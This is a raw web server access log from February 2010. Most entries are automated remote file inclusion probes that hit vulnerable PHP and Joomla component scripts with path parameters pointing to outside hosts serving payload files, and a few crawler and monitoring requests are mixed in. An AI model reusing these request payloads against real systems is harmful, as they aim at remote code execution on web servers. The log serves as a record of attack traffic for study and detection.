114.108.128.160 - - [15/Feb/2010:01:34:32 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:01:34:32 -0500] "GET /logs/access_log.Q109073100%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:01:34:32 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:34:42 -0500] "GET /logs/access_log.Q109071500//appserv/main.php?appserv_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:34:46 -0500] "GET //gnuboard4///bbs//write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:34:46 -0500] "GET /logs/error_log.Q110020400//gnuboard4///bbs//write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:34:46 -0500] "GET /logs//gnuboard4///bbs//write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:01:35:37 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:01:35:37 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:01:35:38 -0500] "GET /logs/access_log.Q109102900//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
218.55.227.145 - - [15/Feb/2010:01:35:42 -0500] "GET /logs/access_log.Q109102900/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:35:52 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:35:52 -0500] "GET /logs/access_log.Q109121000///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:35:52 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 38408 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:35:55 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:35:55 -0500] "GET /logs/access_log.Q109121000///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:35:55 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 38408 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:01:35:55 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:01:35:55 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:01:35:55 -0500] "GET /logs/access_log.Q109102900//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:36:10 -0500] "GET /logs/access_log.Q109092500///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:01:36:18 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.36.1.51 - - [15/Feb/2010:01:36:19 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:36:19 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:36:19 -0500] "GET /logs/access_log.Q109090300%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:36:36 -0500] "GET /logs/access_log.Q109121100%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
207.46.204.232 - - [15/Feb/2010:01:36:47 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.140.23.24 - - [15/Feb/2010:01:36:50 -0500] "GET /logs//gnuboard4///bbs//write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:36:50 -0500] "GET /logs/error_log.Q110020400//gnuboard4///bbs//write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:36:51 -0500] "GET //gnuboard4///bbs//write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:36:56 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:36:56 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:37:03 -0500] "GET /logs/access_log.Q109092500///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:37:04 -0500] "GET /logs/access_log.Q110011600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:37:04 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:37:06 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:37:07 -0500] "GET /logs/access_log.Q110011600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:37:19 -0500] "GET /logs/error_log.Q109052000%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:38:08 -0500] "GET /logs/error_log.Q110020700//gnuboard4///bbs//write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:38:17 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:38:17 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:38:19 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:38:20 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:38:20 -0500] "GET /logs/access_log.Q110011600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:38:20 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:38:23 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:38:23 -0500] "GET /logs/access_log.Q110011600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:38:25 -0500] "GET /logs/access_log.Q110011600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:38:25 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:38:29 -0500] "GET /logs/access_log.Q110011600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:38:30 -0500] "GET /logs/access_log.Q109110100//appserv/main.php?appserv_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:38:30 -0500] "GET /logs/error_log.Q109110100//appserv/main.php?appserv_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:38:32 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:38:50 -0500] "GET /index.php?content=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:38:50 -0500] "GET /logs/index.php?content=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:38:50 -0500] "GET /logs/access_log.Q110021100/index.php?content=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:39:38 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:39:46 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:39:46 -0500] "GET /logs/access_log.Q110011600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.195.115.186 - - [15/Feb/2010:01:39:31 -0500] "GET /logs/error_log.Q109101800 HTTP/1.0" 200 4273524 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.136.125 - - [15/Feb/2010:01:40:21 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:40:24 -0500] "GET /logs/error_log.Q110020700//gnuboard4///bbs//write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:40:28 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:40:28 -0500] "GET /logs/access_log.Q110011600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:40:41 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:40:41 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:40:41 -0500] "GET /logs/error_log.Q110020600%20%20//modules/vwar/admin/admin.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
67.195.115.186 - - [15/Feb/2010:01:40:12 -0500] "GET /logs/error_log.Q109101800 HTTP/1.0" 200 4273524 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.136.125 - - [15/Feb/2010:01:42:15 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:42:23 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:42:23 -0500] "GET /logs/access_log.Q110011600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
95.108.128.242 - - [15/Feb/2010:01:42:28 -0500] "GET /images/Office%20Supply/cell_background.psd HTTP/1.1" 200 34766 "-" "Yandex/1.01.001 (compatible; Win16; I)"
189.6.218.57 - - [15/Feb/2010:01:42:36 -0500] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:42:36 -0500] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:42:36 -0500] "GET /logs/access_log.Q109071400%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:43:32 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:43:33 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:43:40 -0500] "GET /logs/access_log.Q110011600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:43:40 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:43:41 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:43:41 -0500] "GET /logs/access_log.Q110011600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:43:51 -0500] "GET /logs/access_log.Q110020700%20%20//bbs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:43:51 -0500] "GET /logs//bbs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:43:51 -0500] "GET //bbs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:44:02 -0500] "GET /logs/access_log.Q110020800%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:44:17 -0500] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:44:17 -0500] "GET /logs/access_log.Q110020300%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:44:17 -0500] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:01:44:17 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.36.1.51 - - [15/Feb/2010:01:44:18 -0500] "GET /logs/access_log.Q109090300//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:44:27 -0500] "GET /logs/error_log.Q110020300%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:44:56 -0500] "GET /logs/access_log.Q110012600%20%20//bbs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:00 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:00 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:00 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:08 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:08 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:08 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:08 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:08 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:08 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:09 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:09 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:09 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:09 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:09 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:09 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:12 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:12 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:12 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:18 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:18 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:18 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:19 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:19 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:19 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:28 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:28 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:28 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:40 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:40 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:40 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
